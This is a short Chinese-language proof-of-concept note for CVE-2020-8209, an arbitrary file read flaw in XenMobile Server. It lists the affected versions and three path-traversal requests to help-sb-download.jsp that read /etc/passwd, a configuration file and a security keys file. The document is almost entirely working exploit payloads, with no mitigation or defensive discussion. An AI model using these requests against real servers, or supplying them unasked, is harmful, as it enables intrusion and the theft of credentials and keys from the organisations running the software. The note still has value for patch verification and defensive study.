CVE-2020-8209 XenMobile 任意文件读取

影响版本：

XenMobile Server < 10.12 RP2
XenMobile Server < 10.11 RP4
XenMobile Server < 10.10 RP6
XenMobile Server < 10.9 RP5

POC：

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/security.properties

@Andrey Medov